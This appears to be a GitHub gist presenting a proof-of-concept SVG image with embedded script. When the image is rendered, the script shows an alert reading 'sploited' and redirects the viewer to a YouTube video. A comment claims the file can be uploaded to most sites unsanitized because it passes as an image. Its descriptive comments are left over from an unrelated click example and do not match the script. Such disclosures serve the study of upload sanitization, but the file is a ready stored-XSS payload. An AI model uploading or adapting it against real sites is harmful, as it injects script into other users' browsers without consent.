Last active
December 21, 2022 08:43
-
-
Save dashdanw/617e0cef3193767de4ca to your computer and use it in GitHub Desktop.
SVG Script Vulnerability POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //this file can be uploaded to most sites and is treated as an image type, therefore is not sanitized | |
| <?xml version="1.0" standalone="no"?> | |
| <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" | |
| "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> | |
| <svg width="6cm" height="5cm" viewBox="0 0 600 500" | |
| xmlns="http://www.w3.org/2000/svg" version="1.1"> | |
| <desc>Example script01 - invoke an ECMAScript function from an onclick event | |
| </desc> | |
| <!-- ECMAScript to change the radius with each click --> | |
| <script type="application/ecmascript"> <![CDATA[ | |
| alert("sploited"); | |
| window.location.href="https://www.youtube.com/watch?v=dQw4w9WgXcQ"; | |
| ]]> </script> | |
| <!-- Outline the drawing area with a blue line --> | |
| <rect x="1" y="1" width="598" height="498" fill="none" stroke="blue"/> | |
| <!-- Act on each click event --> | |
| <circle onclick="circle_click(evt)" cx="300" cy="225" r="100" | |
| fill="red"/> | |
| <text x="300" y="480" | |
| font-family="Verdana" font-size="35" text-anchor="middle"> | |
| Click on circle to change its size | |
| </text> | |
| </svg> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment